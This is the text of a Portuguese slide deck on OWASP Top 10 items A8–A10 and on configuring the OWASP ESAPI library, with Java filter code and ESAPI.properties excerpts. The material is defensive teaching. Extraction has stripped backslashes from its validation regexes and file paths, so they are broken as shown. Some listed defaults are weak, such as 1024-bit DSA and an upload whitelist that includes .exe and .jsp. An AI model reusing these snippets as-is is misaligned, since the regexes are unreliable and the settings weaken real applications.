    78 OWASP Top 10  A8:Falha ao restringir o acesso às URLs Como evitar: • As políticas de autenticação e autorização deverá ser baseada em papéis (RBAC - role based access control), para minimizar o esforço necessário para manter estas políticas. • As políticas devem ser altamente configuráveis, de modo a minimizar qualquer aspecto codificado da política. • O mecanismo de execução deve por padrão negar todos os acessos, necessitando de permissões explícitas para usuários e papéis específicos para permitir o acesso a cada página. • Se a página está envolvida em um fluxo de trabalho, é necessário verificar se as condições estão em um estado apropriado para permitir o acesso aos recursos.
  • 79.
    79 OWASP Top 10  A8:Falha ao restringir o acesso às URLs Cenário de ataque: • O atacante simplesmente modifica o apontamento da URL de destino no browser URL gerada pela aplicação: URL adulterada: http://example.com/app/getappInfo ← acesso legítimo http://example.com/app/admin_getappInfo ← acesso indevido
  • 80.
    80 OWASP Top 10  A8:Falha ao restringir o acesso às URLs Como evitar: • Verificar se o usuário tem permissão de acessar a URL –É recomendável que esta verificação seja implementada na forma de um filtro java para verificar o acesso a todas as páginas ESAPI.accessController().isAuthorizedForURL(request.getRequestURI());
  • 81.
    81 OWASP Top 10  A8:Falha ao restringir o acesso às URLs Como evitar: • Verificação implementada na forma de Filtro Java public void doFilter(ServletRequest req, ServletResponse resp, FilterChain chain) throws IOException { if ( !ESAPI.accessController() .isAuthorizedForURL(request.getRequestURI()) ) { request.setAttribute("message", "Acesso não autorizado!" ); RequestDispatcher dispatcher = request.getRequestDispatcher("WEB-INF/index.jsp"); //redireciona para página principal dispatcher.forward(request, response); return; } chain.doFilter(request, response); }
  • 82.
    82 OWASP Top 10  A9:Proteção ineficaz da camada de transporte Características: • Ocorre quando as aplicações falham na autenticação, cifra e proteção da confidencialidade e integridade do tráfego de informações sensíveis na rede. • Quando o fazem, muitas vezes fazem com o uso de recursos e algoritmos fracos, muitas vezes usam certificados inválidos ou expirados, ou não os utilizam corretamente.
  • 83.
    83 OWASP Top 10  A9:Proteção ineficaz da camada de transporte Como evitar: • Exigir conexão SSL em todas as páginas sensíveis. As requisições que não fazem uso de SSL para estas páginas devem ser redirecionadas para a respectiva página SSL. • Defina o flag "secure" em todos os cookies sensíveis. • Configure o seu provedor de SSL para usar apenas algoritmos de criptografia robustos • Certifique que o certificado é válido, não expirado, não revogado e corresponde a todos os domínios usados pelo site. • As conexões de backend e demais conexões devem utilizar as tecnologias de criptografia SSL ou outras similares.
  • 84.
    84 OWASP Top 10  A9:Proteção ineficaz da camada de transporte Como evitar: • Boa parte do problema está na camada de comunicação SSL • A ESAPI pode ser usada para ajudar a: –Garantir que a comunicação seja realizada por meio de canal seguro (SSL) –Definir os flags dos cookies como 'secure' –Fornecer métodos que facilitam a criptografia/decriptografia dos dados.
  • 85.
    85 OWASP Top 10  A9:Proteção ineficaz da camada de transporte Como evitar: • Garantindo a comunicação via canal SSL –garantir que o request use SSL e a passagem de parâmetros seja via POST –garantir apenas o uso do SSL try{ ESAPI.httpUtilities().assertSecureRequest(request); } catch ( AccessControlException ace) { } try{ ESAPI.httpUtilities().assertSecureChannel(request); } catch ( AccessControlException ace) { }
  • 86.
    86 OWASP Top 10  A9:Proteção ineficaz da camada de transporte Como evitar: • Definindo os flags dos cookies como 'secure', encapsulando a requisição com o uso do wrapper SecurityWrapperRequest: HttpServletRequest safeReq = new SecurityWrapperRequest( request ); HttpServletResponse safeResp = new SecurityWrapperResponse( response );
  • 87.
    87 OWASP Top 10  A9:Proteção ineficaz da camada de transporte Como evitar: • Utilizar métodos que facilitam a criptografia/decriptografia dos dados – ESAPI.encryptor().encrypt(PlainText message) – ESAPI.encryptor().decrypt(CypherText message) – ESAPI.httpUtilities().encryptQueryString(String query) – ESAPI.httpUtilities().decryptQuery(String encrypted) – ESAPI.httpUtilities().encryptHiddenField(String value) – ESAPI.httpUtilities().dencryptHiddenField(String encrypted)
  • 88.
    88 OWASP Top 10  A9:Proteção ineficaz da camada de transporte Como evitar: • Criptografando a query string • Decriptografando a query string String url = "http://example.com/tela.jsp?encQuery="; String queryString = "field1=value1&field2=value2&field3=value3"; String urlEnc = url+ESAPI.httpUtilities().encryptQueryString(queryString); String encQueryParam = request.getParameter("encQuery"); java.util.Map<String, String> mapQueryString = ESAPI.httpUtilities().decryptQueryString(encQueryParam);
  • 89.
    89 OWASP Top 10  A10:Redirecionamentos inseguros Características: • Ocorre quando as aplicações Web redirecionam e encaminham usuários para outras páginas e sítios de Web e usam para isto dados não confiáveis para determinar as páginas de destino. • Sem uma validação adequada, os atacantes podem redirecionar as vítimas para sítios de phishing ou malware, ou então usar o mecanismo de encaminhamento para acessar páginas não autorizadas.
  • 90.
    90 OWASP Top 10  A10:Redirecionamentos inseguros Como evitar: • Não utilizar parâmetros dos usuários para o cálculo da URL de destino, ou então utilizar referências indiretas para as URLs. • Assegurar que o valor fornecido é válido e autorizado para o usuário. • Utilizar a ESAPI para realizar o processo de redirecionamento de maneira segura: ESAPI.httpUtilities().sendRedirect (response, request.getParameter("fwd")); ESAPI.httpUtilities().sendForward (request, response, request.getParameter("fwd"));
  • 91.
    91 Biblioteca OWASP ESAPI Oque é a ESAPI? • É uma API de segurança corporativa. • Desenvolvido pela OWASP • Licença BSD • Linguagens: – Java (Java EE) – .NET – ASP classico – PHP –ColdFusion –Python –Haskell –Javascript
  • 92.
    92 Biblioteca OWASP ESAPI Oque é a ESAPI? • É apenas uma coleção de blocos de segurança pré-moldados, de código aberto projetados para ajudar a equipar as aplicações existentes com a segurança. • ESAPI Framework Integration Project – Serão compartilhadas as melhores práticas para a integração. – Existe uma grande espectativa das equipes de frameworks como o Struts adotarem a ESAPI
  • 93.
    93 Biblioteca OWASP ESAPI Oque é uma API de segurança corporativa? • É uma API de alto nível que fornece funções comuns de segurança na forma de um serviço para a aplicação que faz uso da biblioteca. • É configurada de modo centralizado para manter a configuração separada da implementação. • Permite que os desenvolvedores não necessitem desviar o foco da atenção para escrever controles de segurança próprios para os componentes, promovendo assim o reuso. • Atende a um ambiente de desenvolvimento de código seguro e convenções de codificação. • Fornece uma API comum (em relação às interfaces), mas que também permite a customização ou extensão para se adaptar a ambientes específicos. Fonte: Chris Schmidt, Solving Real World Problems with ESAPI, FROC 2010
  • 94.
    94 Biblioteca OWASP ESAPI Fonte:Chris Schmidt, Solving Real World Problems with ESAPI, FROC 2010
  • 95.
    95 Biblioteca OWASP ESAPI Fonte:Chris Schmidt, Solving Real World Problems with ESAPI, FROC 2010
  • 96.
    96 Biblioteca OWASP ESAPI Fonte:Chris Schmidt, Solving Real World Problems with ESAPI, FROC 2010
  • 97.
    97 Biblioteca OWASP ESAPI ESAPIx SLDC O ciclo de desenvolvimento de sistemas (Systems Development Life Cycle - SDLC), ou ciclo de desenvolvimento de software em engenharia de sistemas e engenharia de software, é o processo de criação ou modificação de sistemas, com o uso de modelos e metodologias que são utilizados para desenvolver sistemas. Fonte: Chris Schmidt, Solving Real World Problems with ESAPI, FROC 2010
  • 98.
    98 Biblioteca OWASP ESAPI ESAPIx SLDC Resposta: Em todas as fases! Em qual das fases a ESAPI se encaixa? Fonte: Chris Schmidt, Solving Real World Problems with ESAPI, FROC 2010
  • 99.
    99 Biblioteca OWASP ESAPI PremissasBásicas: • Segurança não é um evento único: – Deve ser aplicado e aprimorado constantemente. • Processo de desenvolvimento: – Uma iniciativa de codificação segura deve abordar todos os estágios do ciclo de vida de um software. • Tratar o problema na raiz – Onde o esforço e o custo de correção são menores.
  • 100.
    100 Biblioteca OWASP ESAPI Benefíciosde identificar as falhas de segurança logo no início do ciclo de vida do desenvolvimento, onde o custo e o esforço de correção são baixos
  • 101.
    101 Biblioteca OWASP ESAPI Ciclode vida de requisição segura Fonte: Chris Schmidt, Solving Real World Problems with ESAPI, FROC 2010
  • 102.
    102 Biblioteca OWASP ESAPI Fonte:Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs, Aspect Security Problemática atual:
  • 103.
    103 Biblioteca OWASP ESAPI Asvulnerabilidades originam-se de: • Controles inexistentes – Inexistência de mecanismo de criptografia; – Falha em realizar o controle de acesso • Controles Ineficientes – Algorítimo de geração de hash fraco, ex: MD5 – Mecanismo de tratamento de entrada/saída de dados desatualizado • Controles Ignorados – Falha no uso da criptografia – Trechos de código onde faltam as rotinas de codificação dos dados de saída Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs, Aspect Security
  • 104.
    104 Biblioteca OWASP ESAPI Oscontroles de segurança que um desenvolvedor precisa devem ser: • Padronizados • Centralizados • Organizados • Integrados • Intuitivos • Testados • Devem possuir alta qualidade Resolve os problemas de controles inexistentes e ineficientes Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs, Aspect Security
  • 105.
    105 Biblioteca OWASP ESAPI Eo problema dos controles ignorados ? • As seguintes ações não solucionam, mas ajudam: – Guias de codificação – Análise estática – Treinamento de desenvolvedores – Testes unitários Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs, Aspect Security
  • 106.
    106 Arquitetura Fonte: Jeff Williams,Establishing an Enterprise Security API to Reduce Application Security Costs, Aspect Security
  • 107.
    107 Tratando Configuração deSegurança da Aplicação Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs, Aspect Security
  • 108.
    108 Configurando ESAPI Proteção dosarquivos de configuração (nível de SO): • Uma proteção no nível do sistema operacional deve ser empregada para proteger o diretório de recursos .esapi, incluindo todos os arquivos dentro do diretório e todos os caminhos que vão até o diretório raiz do sistema de arquivos. • Caso estiver usando implementações baseadas em arquivos (ex: FileBasedAuthenticator), alguns arquivos necessitam ter permissões de leitura e escrita (read-write) devido o fato de serem atualizados dinamicamente.
  • 109.
    109 Configurando ESAPI • AESAPI foi projetada para ser facilmente extensível. • As implementações de referência podem ser usadas, mas, caso necessário, podem ser substituídas por implementações próprias que se integram à infraestrutura de segurança já existente. • Isto permite que implementações de segurança sejam facilmente substituídas no futuro sem a necessidade de reescrever toda a aplicação.
  • 110.
    110 Configurando ESAPI • Épossível definir o classname para o provedor que se deseja utilizar para a aplicação cliente no arquivo ESAPI.properties. • O único requisito é que implemente a interface ESAPI apropriada. • O trecho do arquivo de configuração a seguir, mostra as referências definidas por padrão na biblioteca: (...) ESAPI.AccessControl=org.owasp.esapi.reference.DefaultAccessController ESAPI.Authenticator=org.owasp.esapi.reference.FileBasedAuthenticator ESAPI.Encoder=org.owasp.esapi.reference.DefaultEncoder ESAPI.Encryptor=org.owasp.esapi.reference.JavaEncryptor ESAPI.CipherText=org.owasp.esapi.reference.DefaultCipherText ESAPI.PreferredJCEProvider=SunJCE ESAPI.Executor=org.owasp.esapi.reference.DefaultExecutor ESAPI.HTTPUtilities=org.owasp.esapi.reference.DefaultHTTPUtilities ESAPI.IntrusionDetector=org.owasp.esapi.reference.DefaultIntrusionDetector ESAPI.Logger=org.owasp.esapi.reference.Log4JLogFactory ESAPI.Randomizer=org.owasp.esapi.reference.DefaultRandomizer ESAPI.Validator=org.owasp.esapi.reference.DefaultValidator (...)
  • 111.
    111 Configurando ESAPI (...) ESAPI.AccessControl=org.owasp.esapi.reference.DefaultAccessController ESAPI.Authenticator=org.owasp.esapi.reference.FileBasedAuthenticator ESAPI.Encoder=org.owasp.esapi.reference.DefaultEncoder ESAPI.Encryptor=org.owasp.esapi.reference.JavaEncryptor ESAPI.CipherText=org.owasp.esapi.reference.DefaultCipherText ESAPI.PreferredJCEProvider=SunJCE ESAPI.Executor=org.owasp.esapi.reference.DefaultExecutor ESAPI.HTTPUtilities=org.owasp.esapi.reference.DefaultHTTPUtilities ESAPI.IntrusionDetector=org.owasp.esapi.reference.DefaultIntrusionDetector ESAPI.Logger=org.owasp.esapi.reference.Log4JLogFactory ESAPI.Randomizer=org.owasp.esapi.reference.DefaultRandomizer ESAPI.Validator=org.owasp.esapi.reference.DefaultValidator (...) (...) ESAPI.AccessControl=org.owasp.esapi.reference.DefaultAccessController ESAPI.Authenticator=com.myapp.security.authenticator.MyAuthenticator ESAPI.Encoder=org.owasp.esapi.reference.DefaultEncoder ESAPI.Encryptor=org.owasp.esapi.reference.JavaEncryptor ESAPI.CipherText=org.owasp.esapi.reference.DefaultCipherText ESAPI.PreferredJCEProvider=SunJCE ESAPI.Executor=org.owasp.esapi.reference.DefaultExecutor ESAPI.HTTPUtilities=org.owasp.esapi.reference.DefaultHTTPUtilities ESAPI.IntrusionDetector=org.owasp.esapi.reference.DefaultIntrusionDetector ESAPI.Logger=com.myapp.security.log.MyLogger ESAPI.Randomizer=org.owasp.esapi.reference.DefaultRandomizer ESAPI.Validator=org.owasp.esapi.reference.DefaultValidator (...) ESAPI.properties Configuração Original ESAPI.properties ConfiguraçãoModificada
  • 112.
    112 Configurando ESAPI • Implementaçõesque dependem de outros arquivos: (...) ESAPI.AccessControl=org.owasp.esapi.reference.DefaultAccessController ESAPI.Authenticator=org.owasp.esapi.reference.FileBasedAuthenticator ESAPI.Encoder=org.owasp.esapi.reference.DefaultEncoder ESAPI.Encryptor=org.owasp.esapi.reference.JavaEncryptor ESAPI.CipherText=org.owasp.esapi.reference.DefaultCipherText ESAPI.PreferredJCEProvider=SunJCE ESAPI.Executor=org.owasp.esapi.reference.DefaultExecutor ESAPI.HTTPUtilities=org.owasp.esapi.reference.DefaultHTTPUtilities ESAPI.IntrusionDetector=org.owasp.esapi.reference.DefaultIntrusionDetector ESAPI.Logger=org.owasp.esapi.reference.Log4JLogFactory ESAPI.Randomizer=org.owasp.esapi.reference.DefaultRandomizer ESAPI.Validator=org.owasp.esapi.reference.DefaultValidator (...) Requer arquivo users.txt no diretório .esapi Requer arquivo ESAPI-AccessControlPolicy.xml e URLAccessRules.txt no diretório .esapi Requer arquivo log4j.xml ou log4j.properties no classpath .esapi/ESAPI-AccessControlPolicy.xml .esapi/URLAccessRules.txt .esapi/users.txt
  • 113.
    113 Validação, Codificação eInjeção Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs, Aspect Security
  • 114.
    114 Tratando Validação eCodificação Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs, Aspect Security
  • 115.
    115 Codificação e Decodificaçãode Dados não Confiáveis Fonte: OWASP ESAPI Javadoc
  • 116.
    116 Configurando Encoder • AESAPI realiza a canocalização dos dados de entrada antes de realizar a validação dos dados para prevenir tentativas de burlar os filtros com ataques codificados. • A canonicalização ocorre automaticamente quando se utiliza o Validator da ESAPI, mas também é possível invocar o método de canocalização diretamente, conforme o trecho de código a seguir: String result = ESAPI.encoder().canonicalize( request.getParameter("input") );
  • 117.
    117 Configurando Encoder (...) #=========================================================================== # ESAPIEncoder # Encoder.AllowMultipleEncoding=false Encoder.AllowMixedEncoding=false Encoder.DefaultCodecList=HTMLEntityCodec,PercentCodec,JavaScriptCodec #=========================================================================== (...) Configuração Padrão • Permitir codificação múltipla • Permitir codificação mista • Lista de CODECs padrão
  • 118.
    118 Configurando Encoder Encoder.AllowMultipleEncoding=false Multiple Encoding– Codificação Múltipla • Codificação multipla ocorre quando um formato de codificação é aplicado diversas vezes. • Permitir a codificação múltipla é uma prática totalmente desaconselhável.
  • 119.
    119 Configurando Encoder Mixed Encoding– Codificação Mista • A codificação mista ocorre quando diferentes formatos de codificação são aplicados, ou quando múltiplos formatos são aninhados. • Habilitar a codificação mista é uma prática totalmente desaconselhável. Encoder.AllowMixedEncoding=false
  • 120.
    120 Configurando Encoder 120 String result= ESAPI.encoder().canonicalize( "%22hello world&#x22;" ); 09/11/2010 10:24:40 org.owasp.esapi.reference.JavaLogFactory$JavaLogger log SEVERE: [Anonymous:null@unknown -> /IntrusionException] INTRUSION - Mixed encoding (2x) detected in %22hello world&#x22; Exception in thread "main" org.owasp.esapi.errors.IntrusionException: Input validation failure at org.owasp.esapi.reference.DefaultEncoder.canonicalize(DefaultEncoder.java:161) at org.owasp.esapi.reference.DefaultEncoder.canonicalize(DefaultEncoder.java:105) at Teste.main(Teste.java:114) 120 String result = ESAPI.encoder().canonicalize( "&#x22;hello world&#x22;" ); "hello world" String result = ESAPI.encoder().canonicalize( "%22hello world%22" ); "hello world"
  • 121.
    121 Configurando Encoder CodeList –Lista de Codificadores • A lista de codificação padrão contém os codecs a serem aplicados quando estiver realizando a canocalização de dados não confiáveis • A lista deve incluir os codecs para todos os interpretadores ou decodificadores. Encoder.DefaultCodecList=HTMLEntityCodec,PercentCodec,JavaScriptCodec
  • 122.
    122 Configurando Validator Possui asconfigurações de validação dos dados nos seguintes arquivos: • ESAPI.properties –Contém expressões regulares usadas pelos módulos da ESAPI • validation.properties –Contém expressões regulares criadas pelo próprios usuários
  • 123.
    123 Configurando Validator (...) #=========================================================================== # ESAPIEncoder # Validator.ConfigurationFile=validation.properties # Validators used by ESAPI Validator.AccountName=^[a-zA-Z0-9]{3,20}$ Validator.SystemCommand=^[a-zA-Z-/]{1,64}$ Validator.RoleName=^[a-z]{1,20}$ #the word TEST below should be changed to your application #name - only relative URL's are supported Validator.Redirect=^/test.*$ (...) ESAPI.properties
  • 124.
    124 Configurando Validator (...) # GlobalHTTP Validation Rules # Values with Base64 encoded data (e.g. encrypted state) will need at least [a-zA-Z0-9/+=] Validator.HTTPScheme=^(http|https)$ Validator.HTTPServerName=^[a-zA-Z0-9_.-]*$ Validator.HTTPParameterName=^[a-zA-Z0-9_]{1,32}$ Validator.HTTPParameterValue=^[a-zA-Z0-9.-/+=@_ ]*$ Validator.HTTPCookieName=^[a-zA-Z0-9-_]{1,32}$ Validator.HTTPCookieValue=^[a-zA-Z0-9-/+=_ ]*$ Validator.HTTPHeaderName=^[a-zA-Z0-9-_]{1,32}$ Validator.HTTPHeaderValue=^[a-zA-Z0-9()-=*.?;,+/:&_ ]*$ Validator.HTTPContextPath=^[a-zA-Z0-9.-/_]*$ Validator.HTTPServletPath=^[a-zA-Z0-9.-/_]*$ Validator.HTTPPath=^[a-zA-Z0-9.-_]*$ Validator.HTTPQueryString=^[a-zA-Z0-9()-=*.?;,+/:&_ %]*$ Validator.HTTPURI=^[a-zA-Z0-9()-=*.?;,+/:&_ ]*$ Validator.HTTPURL=^.*$ Validator.HTTPJSESSIONID=^[A-Z0-9]{10,30}$ # Validation of file related input Validator.FileName=^[a-zA-Z0-9!@#$%^&{}[]()_+-=,.~'` ]{1,255}$ Validator.DirectoryName=^[a-zA-Z0-9:/!@#$%^&{}[]()_+-=,.~'` ]{1,255}$ (...) ESAPI.properties
  • 125.
    125 Configurando Validator Validator.SafeString=^[.p{Alnum}p{Space}]{0,1024}$ Validator.Email=^[A-Za-z0-9._%'-]+@[A-Za-z0-9.-]+.[a-zA-Z]{2,4}$ Validator.IPAddress=^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$ Validator.URL=^(ht|f)tp(s?)://[0-9a-zA-Z]([-.w]*[0-9a-zA-Z])*(:(0-9)*)*(/?)([a-zA-Z0-9-.?,:'/ +=&amp;%$#_]*)?$ Validator.CreditCard=^(d{4}[- ]?){3}d{4}$ Validator.SSN=^(?!000)([0-6]d{2}|7([0-6]d|7[012]))([-]?)(?!00)dd3(?!0000)d{4}$ validation.properties Chamada referenciando expressão regular de validação: String input = request.getParameter("email"); int maxLength = 512; Boolean allowNull = false; try { someObject.setEmail( ESAPI.validator() .getValidInput("User Email", input, "Email", maxLength, allowNull)); }
  • 126.
    126 Tratando Autenticação eUsuários Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs, Aspect Security
  • 127.
    127 Configurando Authenticator (...) #=========================================================================== # ESAPIAuthenticator # Authenticator.AllowedLoginAttempts=3 Authenticator.MaxOldPasswordHashes=13 Authenticator.UsernameParameterName=username Authenticator.PasswordParameterName=password # RememberTokenDuration (in days) Authenticator.RememberTokenDuration=14 # Session Timeouts (in minutes) Authenticator.IdleTimeoutDuration=20 Authenticator.AbsoluteTimeoutDuration=120 #=========================================================================== (...) Tentativas de login permitidas Número de senhas que não podem se repetir para determinado usuário Nome dos campos de login/senha do formulário de login Parâmetros de Timeout Tempo de duração do token em dias para implementar a funcionalidade “Rember me”
  • 128.
    128 Tratando Controle deAcesso Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs, Aspect Security
  • 129.
    129 Configurando AccessControl O móduloAccessControl depende dos seguintes arquivos e configuração: • ESAPI-AccessControlPolicy.xml (políticas de controle de acesso) • URLAccessRules.txt (regras de restrição de acesso às URLs) URLAccessRules.txt # Regras de Acesso a URL # /app/getappInfo | any | allow | /app/admin_getappInfo | admin | allow |
  • 130.
    130 Tratando Referências Diretaa Objetos Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs, Aspect Security
  • 131.
    131 Tratando segurança noHTTP Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs, Aspect Security
  • 132.
    132 Configurando HttpUtilities • OHttpUtilities provê proteção básica para as requisições e respostas HTTP. • Os métodos prioritariamente protegem contra dados maliciosos provenientes dos atacantes, comumente presentes em caracteres não imprimíveis, caracteres de escaping, e outros ataques mais simples. • O HttpUtilities também prove métodos úteis para tratar cookies, cabeçalhos e tokens CSRF.
  • 133.
    133 Configurando HttpUtilities (...) #=========================================================================== # ESAPIHttpUtilties # Default file upload location (remember to escape backslashes with ) HttpUtilities.UploadDir=C:ESAPItestUpload HttpUtilities.UploadTempDir=C:temp # Force flags on cookies, if you use HttpUtilities to set cookies HttpUtilities.ForceHttpOnlySession=false HttpUtilities.ForceSecureSession=false HttpUtilities.ForceHttpOnlyCookies=true HttpUtilities.ForceSecureCookies=true # Maximum size of HTTP headers HttpUtilities.MaxHeaderSize=4096 # File upload configuration HttpUtilities.ApprovedUploadExtensions=.zip,.pdf,.doc,.docx,.ppt,.pptx,.tar,.gz,.tgz,.rar,.war,.jar,.ear,.xls,.rtf,.proper ties,.java,.class,.txt,.xml,.jsp,.jsf,.exe,.dll HttpUtilities.MaxUploadFileBytes=500000000 HttpUtilities.ResponseContentType=text/html; charset=UTF-8 # This is the name of the cookie used to represent the HTTP session # Typically this will be the default "JSESSIONID" HttpUtilities.HttpSessionIdName=JSESSIONID #=========================================================================== (...)
  • 134.
    134 Tratando Informações Sensíveis Fonte:Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs, Aspect Security
  • 135.
  • 136.
    136 Configurando Encryptor (...) #=========================================================================== # ESAPIEncryption # To calculate these values, you can run: # java -classpath esapi.jar org.owasp.esapi.reference.crypto.JavaEncryptor #Encryptor.MasterKey= ← #Encryptor.MasterSalt= ← Encryptor.PreferredJCEProvider=← # Warning: This property does not control the default reference implementation for # ESAPI 2.0 using JavaEncryptor. Also, this property will be dropped # in the future. # @deprecated Encryptor.EncryptionAlgorithm=AES # For ESAPI Java 2.0 - New encrypt / decrypt methods use this. Encryptor.CipherTransformation=AES/CBC/PKCS5Padding Encryptor.cipher_modes.combined_modes=GCM,CCM,IAPM,EAX,OCB,CWC Encryptor.cipher_modes.additional_allowed=CBC Encryptor.EncryptionKeyLength=128 (...)
  • 137.
    137 Configurando Encryptor Geração doMasterKey e MasterSalt Comando: O resultado gerado será semelhantes a: java -classpath esapi.jar org.owasp.esapi.reference.crypto.JavaEncryptor Copy and paste these lines into ESAPI.properties #============================================================== Encryptor.MasterKey=a6H9is3hEVGKB4Jut+lOVA== Encryptor.MasterSalt=SbftnvmEWD5ZHHP+pX3fqugNysc= #============================================================== Obs.: Este processo apenas facilita a obtenção dos valores
  • 138.
    138 Configurando Encryptor (...) #=========================================================================== # ESAPIEncryption # To calculate these values, you can run: # java -classpath esapi.jar org.owasp.esapi.reference.crypto.JavaEncryptor Encryptor.MasterKey=a6H9is3hEVGKB4Jut+lOVA== Encryptor.MasterSalt=FVD0iUJZR0ZhnPXn+UcFnpcUB84= Encryptor.PreferredJCEProvider=SunJCE # Warning: This property does not control the default reference implementation for # ESAPI 2.0 using JavaEncryptor. Also, this property will be dropped # in the future. # @deprecated # Encryptor.EncryptionAlgorithm=AES # For ESAPI Java 2.0 - New encrypt / decrypt methods use this. Encryptor.CipherTransformation=AES/CBC/PKCS5Padding Encryptor.cipher_modes.combined_modes=GCM,CCM,IAPM,EAX,OCB,CWC Encryptor.cipher_modes.additional_allowed=CBC (...) Utilizar valores obtidos para definir os valores de MasterKey e MasterSalt Se não for definido o valor padrão será SunJCE
  • 139.
    139 Configurando Encryptor (...) Encryptor.ChooseIVMethod=random Encryptor.fixedIV=0x000102030405060708090a0b0c0d0e0f Encryptor.EncryptionKeyLength=128 Encryptor.CipherText.useMAC=true Encryptor.PlainText.overwrite=true # Donot use DES except in a legacy situations. 56-bit is way too small key size. #Encryptor.EncryptionKeyLength=56 #Encryptor.EncryptionAlgorithm=DES # TripleDES is considered strong enough for most purposes. # Note: There is also a 112-bit version of DESede. Using the 168-bit version # requires downloading the special jurisdiction policy from Sun. #Encryptor.EncryptionKeyLength=168 #Encryptor.EncryptionAlgorithm=DESede Encryptor.HashAlgorithm=SHA-512 Encryptor.HashIterations=1024 Encryptor.DigitalSignatureAlgorithm=SHA1withDSA Encryptor.DigitalSignatureKeyLength=1024 Encryptor.RandomAlgorithm=SHA1PRNG Encryptor.CharacterEncoding=UTF-8 (...) Se for utilizar SunJCE sem nenhum Complemento, então deve substituir SHA1withDSA para DSA
  • 140.
    140 Configurando Encryptor (...) Encryptor.ChooseIVMethod=random Encryptor.fixedIV=0x000102030405060708090a0b0c0d0e0f Encryptor.EncryptionKeyLength=128 Encryptor.CipherText.useMAC=true Encryptor.PlainText.overwrite=true # Donot use DES except in a legacy situations. 56-bit is way too small key size. #Encryptor.EncryptionKeyLength=56 #Encryptor.EncryptionAlgorithm=DES # TripleDES is considered strong enough for most purposes. # Note: There is also a 112-bit version of DESede. Using the 168-bit version # requires downloading the special jurisdiction policy from Sun. #Encryptor.EncryptionKeyLength=168 #Encryptor.EncryptionAlgorithm=DESede Encryptor.HashAlgorithm=SHA-512 Encryptor.HashIterations=1024 #Encryptor.DigitalSignatureAlgorithm=SHA1withDSA Encryptor.DigitalSignatureAlgorithm=DSA Encryptor.DigitalSignatureKeyLength=1024 Encryptor.RandomAlgorithm=SHA1PRNG Encryptor.CharacterEncoding=UTF-8 (...) Se for utilizar SunJCE Substituir SHA1withDSA para DSA
  • 141.
    141 Tratando Exceções, Logse Detecção de Intrusos Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs, Aspect Security
  • 142.
    142 Tratando Exceções, Logse Detecção de Intrusos Fonte: OWASP ESAPI Javadoc
  • 143.
    143 Módulo Logger • Osníveis de registo definido por essa interface (em ordem decrescente) são: –Fatal (Crítico) –Error (Erro) –Warning (Aviso) –Info (Informativo) –Debug (Depuração) –Trace (Rastreamento)
  • 144.
    144 Módulo Logger • Habilitandoos níveis de registo: //DESABILITADO todos os níveis ESAPI.log().setLevel( Logger.OFF ); //Habilitando nível FATAL ESAPI.log().setLevel( Logger.FATAL ); //Habilitando nível ERROR ESAPI.log().setLevel( Logger.ERROR ); //Habilitando nível WARNING ESAPI.log().setLevel( Logger.WARNING ); //Habilitando nível INFO ESAPI.log().setLevel( Logger.INFO ); //Habilitando nível DEBUG ESAPI.log().setLevel( Logger.DEBUG ); //Habilitando nível TRACE ESAPI.log().setLevel( Logger.TRACE ); //Habilitando nível ALL ESAPI.log().setLevel( Logger.ALL );
  • 145.
    145 Módulo Logger • Existem4 tipos de eventos de Log: –SECURITY_SUCCESS –SECURITY_FAILURE –EVENT_SUCCESS –EVENT_FAILURE –EVENT_UNSPECIFED Logger.debug( Logger.EventType type, String message) Logger.error( Logger.EventType type, String message) Logger.fatal( Logger.EventType type, String message) Logger.info( Logger.EventType type, String message) Logger.trace( Logger.EventType type, String message) Logger.warning( Logger.EventType type, String message)
  • 146.
    146 Módulo Logger Fonte: OWASPESAPI Javadoc • Exemplos: ESAPI.log().debug( Logger.SECURITY_SUCCESS, “Teste1 – executando ActionX”); ESAPI.log().error( Logger.SECURITY_FAILURE, “Erro conexão SSL”); ESAPI.log().fatal( Logger.EVENT_FAILURE, “Falha de conexão com o banco”); ESAPI.log().info( Logger.EVENT_SUCCESS, “Usuario “+ user + “realizou cadastro!”); ESAPI.log().trace( Logger.EVENT_UNSPECIFED, “Entrou no loop”); ESAPI.log().warning( Logger.EVENT_UNSPECIFED, “Espaço em disco no limite!”);
  • 147.
    147 Configurando Logger (...) #=========================================================================== # ESAPILogging # Set the application name if these logs are combined with other applications Logger.ApplicationName=ExampleApplication # If you use an HTML log viewer that does not properly HTML escape log data, you can set LogEncodingRequired to true Logger.LogEncodingRequired=false # Determines whether ESAPI should log the application name. This might be clutter in some single-server/single-app environments. Logger.LogApplicationName=true # Determines whether ESAPI should log the server IP and port. This might be clutter in some single-server environments. Logger.LogServerIP=true # LogFileName, the name of the logging file. Provide a full directory path (e.g., C:ESAPIESAPI_logging_file) if you # want to place it in a specific directory. Logger.LogFileName=ESAPI_logging_file # MaxLogFileSize, the max size (in bytes) of a single log file before it cuts over to a new one (default is 10,000,000) Logger.MaxLogFileSize=10000000 #=========================================================================== (...)
  • 148.
    148 Módulo Intrusion Detector •Monitora as requisições e toma ações pré-configuradas para determinadas ações • As ações são baseadas na ocorrências de determinadas exceções, como: – IntrusionException – AuthenticationHostException
  • 149.
